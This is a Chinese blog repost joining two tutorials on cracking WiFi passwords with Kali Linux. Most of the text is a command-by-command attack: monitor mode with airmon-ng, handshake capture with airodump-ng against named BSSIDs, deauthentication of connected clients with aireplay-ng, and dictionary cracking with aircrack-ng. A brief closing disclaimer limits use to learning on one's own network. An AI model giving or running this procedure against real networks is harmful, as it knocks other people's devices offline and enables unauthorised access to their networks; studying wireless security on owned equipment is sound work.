利用kali破解WiFi密码
Posted Ryan
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了利用kali破解WiFi密码相关的知识,希望对你有一定的参考价值。
利用kali破解WiFi密码
准备工具
1、笔记本
2、USB无线网卡
3、kali系统
4、密码字典
破解过程
-
进入kali终端,输入以下命令,列出网卡信息
airmon-ng
-
输入以下命令,开启网卡监听
airmon-ng start wlan0
使用 ifconfig
命令查看网卡信息
这个网卡的名字有时候可能会变成 wlan0mon
-
扫描WiFi信号
airodump-ng wlan0
这里的
wlan0
是网卡名称,如果你的变成了wlan0mon
那就写wlan0mon
扫描成功后,按ctrl+c,退出扫描
-
抓取握手包
airodump-ng -w ryan -c 6 --bssid 2C:61:04:F7:94:26 wlan0
-c :指定信道(CH)
-w :指定抓取握手包存放的位置或名称,这里为ryan
--bssid :指定路由器的MAC地址
-
再打开一个终端,输入以下命令
aireplay-ng -0 2 -a 路由器MAC -c 客户机MAC wlan0
使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓取数据包
-0(数字0) :指定发送反认证包的个数
-a :指定路由器的MAC
-c :指定客户机的MAC
- 破解握手包
执行以下命令进行破解
aircrack-ng -w pass.txt ryan-*.cap
kali破解WiFi密码
实验环境
VMware Workstation Pro 虚拟机
kali linux 2021.2 kali Linux系统
无线网卡 支持监听
这些自己准备好,我们直接进入主题
一,查看信息
ifconfig 查看网卡名
二,激活网卡
ifconfig wlan0 up 激活网卡
执行完命令,我们可以看到下面没有什么提示,说明我们的网卡激活成功了!
三,结束干扰进程`
airmon-ng check kill 结束干扰进程
执行完,没有显示什么,继续下一步,有的话也继续下一步
四,开启网卡监听模式
airmon-ng start wlan0 开启网卡监听模式
有的网卡可能跟我的不一样,有的是wlan0mon ,接下来我们都要用这里显示的这个名来执行命令
五,开始监听
airodump-ng wlan0 开始监听
开启监听后,它会自动扫描附近WiFi,当看到自己的想要破解的WiFi后,我们按ctrl+c 停止扫描
然后接下看我们开始下一步
参数介绍:
BSSID:表示无线AP的Mac地址
PWR:网卡报告的信号水平
CH:信道号
MB:无线AP所支持的最大速率
ESSID:局域网名称
STATION:客户端的Mac地址,包括连上的和想要搜索无线来连接的客户端
Rate:表示传输率
六,抓取握手包
airodump-ng -w yyy -c 11 --bssid C8:5B:A0:AF:FD:C2 wlan0
yyy这里表示的是创建的握手包名,大家可以随便写。
11这里是频道CH
C8:5B:A0:AF:FD:C2 这里是BSSID,根据扫面显示的写进去就行!
当出现我指示的字符说明,我们成功的抓到握手包了,有的可能没抓到握手包,那么没关系请看下一步
七,强制断开连接的设备,让它自动再连接
设备自动连接时我们就可以抓到包了,记得新建一个窗口执行命令,原来的窗口不要关闭,看好,有没有出现我指示的字符。出现了说明抓到包了,下面我们接着最后一步。
aireplay-ng -0 5 -a C8:5B:A0:AF:FD:C2 -c 22:21:29:AA:4F:84 wlan0
5 是攻击次数
-a是BSSID
-c是STATON连接的设备
这次我们也成功抓到包了,接下来最后一步
八,用密码字典暴力破解wifi密码握手包
aircrack-ng -w /root/文档/hacker.txt -b C8:5B:A0:AF:FD:C2 /root/yyy-01.cap
这里我们一定要写好绝对路径
-w 字典文件绝对路径
-b BSSID
/root/yyy-01.cap 握手包绝对路径
成功破解如图下!
本文章仅用于学习,自己搭建好环境,不得破解邻居WiFi以及公共场所WiFi,希望大家能够通过本文章了解到,WiFi破解原理,提高网络攻防知识,最后感谢您的浏览,我会更加努力写出更多kali linux 相关知识!
以上是关于利用kali破解WiFi密码的主要内容,如果未能解决你的问题,请参考以下文章